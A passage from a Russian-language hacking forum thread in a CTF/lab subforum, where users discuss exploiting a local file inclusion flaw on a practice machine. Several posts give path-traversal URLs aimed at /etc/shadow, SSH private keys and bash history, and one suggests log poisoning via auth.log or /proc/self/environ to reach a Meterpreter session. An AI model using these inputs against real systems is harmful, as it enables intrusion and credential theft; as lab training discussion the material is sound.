HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.07.2021, 20:05
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию

Цитата:

Qulan сказал(а):

Sorry, не увидел спойлер!! Честно сказать я еще не знаю как это сделать, но за подсказку огромное спасибо. Я обязательно по гуглю и попробую.

Рекомендую почитать про proxychains. Про него есть раздел в PWK.
 
Ответить с цитированием

  #12  
Старый 20.07.2021, 20:12
Qulan
Новичок
Регистрация: 06.12.2020
Сообщений: 0
С нами: 2861674

Репутация: 0
По умолчанию

Цитата:

Pernat1y сказал(а):

Рекомендую почитать про proxychains. Про него есть раздел в PWK.

Благодарю!
 
Ответить с цитированием

  #13  
Старый 22.07.2021, 10:48
nks1ck
Участник форума
Регистрация: 01.03.2021
Сообщений: 222
С нами: 2739091

Репутация: 0
По умолчанию

Цитата:

Qulan сказал(а):

Exploitation LFI

Из того что знаю я (пока что), я могу:
  1. Попробовать почитать /etc/shadow и в случае успеха получить хеш пароля системного пользователя
  2. Попробовать прочитать id_rsa пользователя miguel и reet
  3. Попробовать почитать .bash_history файл пользователя miguel, возможно там есть креды
  4. Попробовать получить доступ к конфигурационным файлам веб -сервера Apache
Код:
http://192.168.1.191:8593/index.php?book=../../../../etc/shadow
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.ssh/id_rsa
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../root/.ssh/id_rsa
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.bash_history
- без результата

Код:
http://192.168.1.191:8593/index.php?book=../../../../var/log/apache2/access.log
- есть контакт)))
По поводу LFI, можешь еще смотреть на /proc/self/environ, там бывает user-agent, который через BurpSuite меняешь на
Код:

Так же есть интересный файл /var/log/auth.log, туда записываются неудачные попытки входа на тот же ssh. Пробуешь зайти на ssh с ником
Код:
""
и смотришь как в терминале
Код:
"Meterpreter session opened"
 
Ответить с цитированием

  #14  
Старый 22.07.2021, 10:52
Qulan
Новичок
Регистрация: 06.12.2020
Сообщений: 0
С нами: 2861674

Репутация: 0
По умолчанию

Цитата:

nks1ck сказал(а):

По поводу LFI, можешь еще смотреть на /proc/self/environ, там бывает user-agent, который через BurpSuite меняешь на
Код:

Так же есть интересный файл /var/log/auth.log, туда записываются неудачные попытки входа на тот же ssh. Пробуешь зайти на ssh с ником
Код:
""
и смотришь как в терминале
Код:
"Meterpreter session opened"
Благодарю. Записал себе)))
 
Ответить с цитированием

  #15  
Старый 22.07.2021, 10:53
nks1ck
Участник форума
Регистрация: 01.03.2021
Сообщений: 222
С нами: 2739091

Репутация: 0
По умолчанию

Так же у журнала "Хакер" есть классная статья по LFI - "Полностью твой админ. Эксплуатируем LFI и выполнение произвольного окда в phpMyAdmin". Если не знаешь где найти - напиши в лс.
 
Ответить с цитированием

  #16  
Старый 23.12.2022, 06:32
wooolff
Новичок
Регистрация: 19.02.2017
Сообщений: 0
С нами: 4856945

Репутация: 0
По умолчанию

хорошо расписал
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.